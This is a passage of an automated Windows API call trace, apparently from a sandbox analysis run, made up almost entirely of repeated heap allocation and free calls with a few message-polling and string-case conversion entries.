dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0249.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0249.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0249.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0249.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.481] CharLowerBuffW (in: lpsz="byte[36872]", cchLength=0xb | out: lpsz="byte[36872]") returned 0xb [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0249.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9008) returned 0x2f2f040 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0249.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0249.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f38050 [0249.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9006) returned 0x2f41060 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38050 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f41060 | out: hHeap=0x970000) returned 1 [0249.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0249.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0249.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0249.487] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0249.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0249.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 